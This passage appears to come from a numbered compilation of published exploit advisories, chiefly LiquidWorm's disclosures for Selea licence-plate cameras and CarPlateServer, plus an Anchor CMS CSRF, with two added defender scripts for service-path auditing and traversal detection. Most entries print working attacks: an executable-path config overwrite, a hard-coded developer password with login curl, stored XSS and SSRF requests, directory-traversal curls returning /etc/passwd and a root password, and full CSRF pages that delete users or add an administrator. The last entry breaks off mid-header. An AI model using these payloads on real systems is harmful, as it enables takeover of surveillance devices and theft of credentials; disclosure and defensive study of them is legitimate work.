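    path = binpath.strip().replace("/", "\\")
    parts = path.split(" ")
    out: List[str] = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            out.append(prefix)
            break
        out.append(prefix + ".exe")
    return out


def audit_service(sc_qc_text: str) -> Dict[str, object]:
    """Summarise the unquoted-path exposure of one `sc qc` listing."""
    fields = parse_sc_qc(sc_qc_text)
    binpath = fields.get("BINARY_PATH_NAME", "")
    unquoted = is_unquoted_with_spaces(binpath)
    image = binpath.strip().replace("/", "\\")
    return {
        "service": fields.get("SERVICE_NAME", ""),
        "runs_as": fields.get("SERVICE_START_NAME", ""),
        "unquoted": unquoted,
        # Locations to check: no non-admin write access may exist on their parent directories.
        "candidates": hijack_candidates(binpath) if unquoted else [],
        # Remediation value, e.g. sc config "<service>" binPath= "\"<image>\""
        "quoted_binpath": f'"{image}"' if unquoted else binpath,
    }


if __name__ == "__main__":
    report = audit_service(SAMPLE_SC_QC)
    print("%s (runs as %s): unquoted=%s" % (report["service"], report["runs_as"], report["unquoted"]))
    for c in report["candidates"]:
        print("  would try:", c)
    print("  set binPath to:", report["quoted_binpath"])
```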
  14. # Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution
      # Date: 08.11.2020
      # Exploit Author: LiquidWorm
      # Vendor Homepage: https://www.selea.com

      Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution

      Vendor: Selea s.r.l.
      Product web page: https://www.selea.com
      Affected version: 4.0.1.6(210120)
                        4.013(201105)
                        3.100(200225)
                        3.005(191206)
                        3.005(191112)

      Summary: Our CPS (Car Plate Server) software is an advanced solution that can be installed on computers and servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences.

      Desc: The server suffers from an arbitrary win32/64 binary executable execution when setting the NO_LIST_EXE_PATH variable to a program of choice. The command will be executed if proper trigger criteria is met. It can be exploited via CSRF or by navigating to /cps/ endpoint from the camera IP and bypass authentication gaining the ability to modify the running configuration including changing the password of admin and other users.

      Tested on: Microsoft Windows 10 Enterprise
                 SeleaCPSHttpServer/1.1

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5622
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php

      08.11.2020

      --

      POST /config_request?ACTION=WRITE HTTP/1.1
      Host: localhost:8080
      Connection: keep-alive
      Content-Length: 6309
      Authorization: Basic ZmFrZTpmYWtl
      Accept: application/json, text/plain, */*
      LoginMode: angular
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75
      AuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a
      content-type: application/json
      Origin: http://localhost:8080
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Referer: http://localhost:8080/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9

      {
        "ACTIONS": {
          "ANIA_LIST_DAYS_NUM": "15",
          "ANIA_LIST_PWD": "",
          "ANIA_LIST_USER": "{B64valuehereommited}",
          "BLACK_LIST_COUNTRY": "",
          "EXACT_MATCH": "false",
          "FUZZY_MATCH": "true",
          "MINISTEROTRASPORTI_LIST_DAYS_NUM": "15",
          "MINISTEROTRASPORTI_LIST_ENABLE_CHECK": "0,1",
          "MINISTEROTRASPORTI_LIST_GET_OWNERS": "false",
          "MINISTEROTRASPORTI_LIST_PWD": "",
          "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE": "false",
          "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION": "false",
          "MINISTEROTRASPORTI_LIST_USER": "",
          "MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER": "false",
          "MINISTEROTRASPORTI_LIST_USE_VPN": "true",
          "MINISTEROTRASPORTI_LIST_VPN_PASSWORD": "",
          "MINISTEROTRASPORTI_LIST_VPN_USERNAME": "",
          "MINISTERO_LIST_DAYS_NUM": "24",
          "MINISTERO_LIST_PWD": "",
          "MINISTERO_LIST_USER": "",
          "NO_LIST_ENABLED": "true",
          "NO_LIST_ENABLE_EXE": "true",
          "NO_LIST_EXE_PATH": "C:/windows/system32/calc.exe",
          "NO_LIST_HTTP": "http://localhost:8080/$TRIGGER_EXE_VAR",
          "NO_LIST_HTTP_ENABLED": "false",
          "NO_LIST_SEND_TCP_ALARM": "",
          "PERMISSIVE_MATCH": "true",
          "WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO": ""
        },
        "CAMERAINFO": { "BA__________": { "APPROACHING": "", "CustomCameraId": "", "CustomGateId": "", "DetectDesc": "ZSL", "DetectId": "", "Direction": "", "GPSLocation": "", "GateDesc": "3", "GateId": "", "LEAVING": "", "ZoneName": "", "setname": "false", "skip": "false" } },
        "CONTEXT": { "BA__________": { "URL": [ "https://www.zeroscience.mk" ] } },
        "DBMS": { "DB_NAME": "", "DB_PASSWORD": "", "DB_SERVER": "", "DB_TYPE": "sqlite", "DB_USERNAME": "", "ENCRYPT_DB": "false", "SQLITE_MAX_MB_RAM_CACHE": "-1" },
        "EMAIL": { "DEST": "", "FROM_EMAIL": "", "FROM_NAME": "", "LOG_USER_SEARCH": "false", "MIN_EMAIL_TIME": "5", "PASSWORD": "", "PORT": "25", "SEND_EMAIL_ON_TAMPER": "false", "SERVER": "", "SSL": "false", "USERNAME": "", "XOAUTH2": "false" },
        "EMAIL-XOAUTH2": { "refresh_token": "" },
        "EZ_CLIENTS": { "PASSWORD": "", "SLAVES": "", "USERNAME": "", "USE_CNTLM": "false", "WANT_CTX": "false" },
        "EZ_CLIENT_SCNTT": { "CTX": "true", "HOST": "", "PASSWORD": "", "PORT": "443", "USERNAME": "" },
        "FTPSYNC": { "DELETE_OLD_SYNC_DAYS": "7", "JSON_CONFIG": "eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==", "SAVE_FTP_SEND_ERRORS": "true" },
        "GLOBAL_HTTP_PROXY": { "CNTLM_ENABLED": "false", "EZ_ADDRESS": "cps.selea.com", "EZ_PORT": "8999", "HOST": "", "NON_PROXY_HOST": "localhost|^(10|127|169\\.254|172\\.1[6-9]|172\\.2[0-9]|172\\.3[0-1]|192\\.168)\\..+", "PASSWORD": "", "PORT": "", "PROXY_ENABLED": "true", "USERNAME": "" },
        "HTTPS": { "CERTIFICATE": "", "ENABLE_HTTP2": "true", "GET_CERTIFICATE_FROM_SELEA": "false", "PRIVATE_KEY": "", "ROOT_CERTIFICATE": "" },
        "MASTER_CPS": { "ENABLED": "true", "MASTERS": "", "PASSWORD": "", "USERNAME": "" },
        "PROXY_TCP": { "ENABLED": "false", "USE_HTTP_PROXY": "false" },
        "REMOTE_LIST": { "ADDRESS": "", "ENABLED": "false", "PASSWORD": "", "PORT": "", "USERNAME": "" },
        "REPORT": { "STATS_AGGREGATE": "true", "STATS_ENABLED": "false", "STATS_FREQ": "MONTH", "STATS_PATH": "", "STATS_SELECTED": "", "STATS_WEEK_DAY": "Mon" },
        "SCNTT": { "LIST_A1_DAYS_LIMIT": "0", "SCNTT_PASSWORD": "", "SCNTT_PRIV_KEY_FILENAME": "", "SCNTT_PUB_CERT": "", "SCNTT_SYSTEM_DESC": "", "SCNTT_SYSTEM_ID": "", "SCNTT_USERNAME": "" },
        "SETTINGS": { "ALLOW_FLASH_NOTIFICATIONS": "true", "AUTO_UPDATE": "true", "BACKUP_AT_SPECIFIC_HOUR": "-1", "BACKUP_DB_PATH": "", "BACKUP_EVERY_HOURS": "0", "CARPLATE_DETAILS_ENABLED": "false", "CHECK_EXPIRING_CARPLATES": "false", "CHECK_EXPIRING_CARPLATES_DAYS": "7", "CHECK_FILENAME_SYNTAX": "true", "DB_DELETE_DAYS": "90", "DB_DELETE_ENABLE": "false", "DB_DELETE_LOG_DAYS": "7", "DB_DELETE_OCR_FILE": "90", "DB_STATS_DELETE_DAYS": "90", "DISABLE_WHITELIST_REMOTE_DB_CHECK": "false", "ENCRYPT_IMAGES": "false", "FREE_DISK_LIMIT": "1000", "FRIENDLY_NAME": "test", "FTP_CUSTOM_PORT_RANGE": "false", "FTP_DOWNLOAD_DISABLED": "true", "FTP_ENABLED": "true", "FTP_EXTERN_IP": "", "FTP_EXTERN_IP_AUTO": "false", "FTP_LIST_DIR_DISABLED": "true", "FTP_MAX_PORT": "0", "FTP_MIN_PORT": "0", "FTP_PORT": "21", "FTP_USERS": "", "FTP_USE_FTPS": "true", "HTTP2_PORT": "8081", "HTTP_PASSWORD": "CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU", "HTTP_PORT": "8080", "HTTP_USERNAME": "admin", "IGNORE_CONTEXT_FOR_UNREADFAKE": "false", "IGNORE_IF_NOT_SYNTAX_MATCH": "false", "MILESTONE_CONNECTIONS": "5", "MILESTONE_ENABLED": "true", "MILESTONE_ENABLE_ACTIVE_CONNECTION": "false", "MILESTONE_PORT": "5666", "MILESTON_REMOTE_IP": "", "MILESTON_REMOTE_PORT": "8080", "MIN_LOG_LEVEL": "0", "PERIODIC_BACKUP_CONFIG": "0", "REMOVE_BLACK_LIST_ON_EXPIRE": "true", "REMOVE_NON_ALARM_CARPLATE": "false", "REMOVE_WHITE_LIST_ON_EXPIRE": "true", "SAVE_GATEWAY_SEND_ERRORS": "true", "SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS": "7", "SEND_EMAIL_ON_LOST_CONNECTION": "false", "SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME": "600", "SEND_EMAIL_ON_NO_PLATE_READ": "false", "SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME": "12", "SERVER_NTP_ON": "false", "SERVER_NTP_PORT": "123", "USE_HTTPS": "false" },
        "VPNC": { "VPN_NET_NAME": "" },
        "TCP_TEMPLATES": []
      }
  15. # Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://anchorcms.com/download
# Version: 0.12.7
# CVE : CVE-2020-23342

###PoC

The CMS uses the GET method to perform sensitive actions, hence users can be deleted via exploit.html.

================================
<img src="http://target/anchor/index.php/admin/users/delete/21">
================================

Where (21) is the user id. When the admin clicks on the exploit.html link, the user with id 21 will be deleted.
  16. # Exploit Title: Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera Developer Backdoor Config Overwrite


Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: There is a hard-coded password for a hidden and undocumented /dev.html page that enables the vendor to enable configuration upload / overwrite to the affected device using the checkManufacturer() function through an AJAX method.

======================================================================================
/dev.html:
----------
...
...
function checkManufacturer(){
	var manufacturer=$.cookie('manufacturer');
	if (manufacturer){
		$('#set_manufacturer').val('Disable manufacturer');
		$('#dev_page').show();
		$('#config_restore').show();
	}
	else{
		$('#set_manufacturer').val('Enable manufacturer');
		$('#dev_page').hide();
		$('#config_restore').hide();
	}
}
checkManufacturer();

function setMsg(msg){$('#dev_msg').html(msg); setTimeout(function(){$('#dev_msg').html("");},5000)};

$('#set_manufacturer').click(function(){
	var manufacturer=$.cookie('manufacturer');
	if (manufacturer){
		$.cookie('manufacturer',null);
		location.reload();
	}
	else{
		$.ajax({
			url: "/cgi-bin/utils.php?cmd=DEVPASS&pwd="+md5($('#dev_pwd').val()),
			timeout: 2000,
			cache:false,
			mimeType: 'text/plain'
		}).done(function(result){
			try{
				var info=$.parseJSON(result);
				if (info.auth=="OK"){
					setManufacturerTimeout();
					location.reload();
...
...

/cgi-bin/utils.php:
-------------------
...
...
$cmd=$_GET["cmd"];

if ($cmd=="DEVPASS"){
	$pwd=$_GET["pwd"];
	$info=new StdClass();
	$info->auth=($pwd==md5("Selea781830"))?"OK":"ERROR";
	print(json_encode($info, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | JSON_NUMERIC_CHECK | JSON_PRETTY_PRINT));
	exit();
}
...
...
======================================================================================

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd
           HttpServer/0.1
           SeleaCPSHttpServer/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5615
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5615.php


07.11.2020

--


$ curl http://192.168.1.17/cgi-bin/utils.php?cmd=DEVPASS&pwd=4654fa64de66a5ff0befde3c0203817b
{
  "auth": "OK"
}

OR

Navigate to /dev.html and enter password: Selea781830, enable config upload.
  17. # Exploit Title: Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera Remote Stored XSS


Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: The application suffers from a stored XSS through a POST request. The issue is triggered when input passed to the 'files_list' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd
           HttpServer/0.1
           SeleaCPSHttpServer/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5614
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5614.php


07.11.2020

--


Remote Stored XSS:
------------------

POST /cgi-bin/get_file.php HTTP/1.1
Host: 192.168.1.17

name=Test&files_list=<marquee><h3>t00t</h3></marquee>


Unauthenticated Log Pollution Trigger XSS:
------------------------------------------

GET /get_log.php?type=system HTTP/1.1
Host: 192.168.1.17
  18. # Exploit Title: Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera Unauthenticated SSRF


Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application.

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd
           HttpServer/0.1
           SeleaCPSHttpServer/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5617
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php


07.11.2020

--


Request:
--------

POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1
Host: 192.168.1.17

{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://127.0.0.1:80","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}

Response (port 80):
-------------------

{"bandwidth": 1.3571428571428572,"elapsed_ms": 14,"result": "OK","size": 19}

Response (port 8080):
---------------------

{"code": 500,"error": "Error sending notification: Connection refused"}


Request:
--------

POST /cps/test_url HTTP/1.1
Host: 192.168.1.17

{"url":"http://127.0.0.1:80"}

Response (port 80):
-------------------

{"elapsed_ms": 2,"jpeg": "GGh0bWw+CjxoZWFkPgo8dGl0bGU+U2VsZWEgQU5QU4BjYW1lcmE8L3RpdGxlPgo8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO1VSTD0vbhl2ZS5odG1sIj4KPC9oZWFkPgo8Ym9keT48L2JvJHk+CjwvaHRtbD4KCg==","result": "OK"}

Response (port 8081):
---------------------

{"elapsed_ms": 1,"error": "Connection refused"}
  19. # Exploit Title: Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera Unauthenticated Directory Traversal File Disclosure


Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the Download Archive in Storage page using get_file.php script is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker to disclose clear-text credentials resulting in authentication bypass.

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd
           HttpServer/0.1
           SeleaCPSHttpServer/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5616
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php


07.11.2020

--


$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json
{
  "viewers": {},
  "root_pwd": "P@$$w0rd",
  "operators": {}
}

$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false


POST /cgi-bin/get_file.php HTTP/1.1
Host: 192.168.1.17

name=TESTINGUS&files_list=/etc/passwd


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-disposition: attachment; filename="TESTINGUS.tar"
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 2048
Connection: close
Date: Wed, 09 Dec 2020 01:39:57 GMT
Server: selea_httpd

root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
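For defenders, an added Python example (not part of the advisory or of Selea's code) showing the two checks the device above is missing and the matching detection: it fully percent-decodes a request path (so the `%2f..%2f` form in the curl requests and double-encoded variants both resolve), normalises it and verifies it stays under the storage root, and it flags `get_file.php` bodies whose `files_list` names an absolute or traversing path. The `IMAGE_ROOT` value comes from the advisory's URL; the function names and the sample requests are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Directory the storage download handler is meant to serve from (from the advisory's URL).
IMAGE_ROOT = "/CFCARD/images/SeleaCamera"

# Matches "../" or "..\" anywhere in an already-decoded value.
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\)")


def full_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %2f, %252f and %252e%252e all collapse to their literal form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_under_root(request_path: str, root: str = IMAGE_ROOT):
    """The check a file-serving handler should do: decode, normalise, then confine to root.

    Returns (is_safe, normalised_path). normpath() folds '..' segments and repeated
    slashes, so a path that climbs out of root is visible as a path that no longer
    starts with root.
    """
    normalised = posixpath.normpath(full_decode(request_path))
    root = root.rstrip("/")
    is_safe = normalised == root or normalised.startswith(root + "/")
    return is_safe, normalised


def inspect_request(method: str, target: str, body: str = ""):
    """Classify one request (method, request-target, optional form body) into findings."""
    findings = []
    path = urlsplit(target).path
    decoded_path = full_decode(path)

    # Finding 1: a request that starts inside the image root but escapes it after decoding.
    if decoded_path.startswith(IMAGE_ROOT):
        safe, normalised = resolve_under_root(path)
        if not safe:
            findings.append("traversal: " + normalised)

    # Finding 2: get_file.php archive download whose files_list is absolute or traverses.
    if method == "POST" and path.endswith("/cgi-bin/get_file.php"):
        for entry in parse_qs(body).get("files_list", []):
            entry = full_decode(entry)
            if entry.startswith("/") or TRAVERSAL_RE.search(entry):
                findings.append("files_list: " + entry)
    return findings


# Constructed sample traffic modelled on the advisory's requests plus two benign ones.
CONSTRUCTED_REQUESTS = [
    ("GET", "/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json", ""),
    ("GET", "/CFCARD/images/SeleaCamera/%252e%252e%252fetc/passwd", ""),       # double-encoded variant
    ("GET", "/CFCARD/images/SeleaCamera/2020/12/09/plate_0001.jpg", ""),        # legitimate download
    ("POST", "/cgi-bin/get_file.php", "name=TESTINGUS&files_list=/etc/passwd"),
    ("POST", "/cgi-bin/get_file.php", "name=archive&files_list=2020/12/09/plate_0001.jpg"),
]


def scan(requests=CONSTRUCTED_REQUESTS):
    """Run inspect_request over a list of (method, target, body); return {target: findings}."""
    return {target: f for method, target, body in requests if (f := inspect_request(method, target, body))}


if __name__ == "__main__":
    for target, findings in scan().items():
        print(target, "->", findings)
```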
  20. # Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit


Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd
           HttpServer/0.1
           SeleaCPSHttpServer/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5618
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5618.php


07.11.2020

--


Add Admin:
----------

<html>
  <body>
  <script>
    function submitRequest()
    {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http:\/\/192.168.1.17\/save_params.php", true);
      xhr.setRequestHeader("Accept", "*\/*");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
      xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=cfgboundary-----------------------1607475234133");
      xhr.withCredentials = true;
      var body = "--cfgboundary-----------------------1607475234133\r\n" +
        "Content-Disposition: form-data; name=\"set_params\"\r\n" +
        "\r\n" +
        "upload\r\n" +
        "--cfgboundary-----------------------1607475234133\r\n" +
        "Content-Disposition: form-data; name=\"user_file\"; filename=\"set_params.dat\"\r\n" +
        "Content-Type: application/octet-stream\r\n" +
        "\r\n" +
        "[SECURITY.USERS]\r\n" +
        "security-users-0-username = testingus\r\n" +
        "security-users-0-password = testingus\r\n" +
        "security-users-0-rights = 2\r\n" +
        "security-users-1-username = \r\n" +
        "security-users-1-password = \r\n" +
        "security-users-1-rights = 0\r\n" +
        "security-users-2-username = \r\n" +
        "security-users-2-password = \r\n" +
        "security-users-2-rights = 0\r\n" +
        "security-users-3-username = \r\n" +
        "security-users-3-password = \r\n" +
        "security-users-3-rights = 0\r\n" +
        "security-allow_viewers_storage_access = 1\r\n" +
        "CFG_ROOTPASS = admin\r\n" +
        "\r\n" +
        "--cfgboundary-----------------------1607475234133--\r\n";
      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
      xhr.send(new Blob([aBody]));
    }
  </script>
  <form action="#">
    <input type="button" value="Add Admin" onclick="submitRequest();" />
  </form>
  </body>
</html>
  21. # Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure


Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
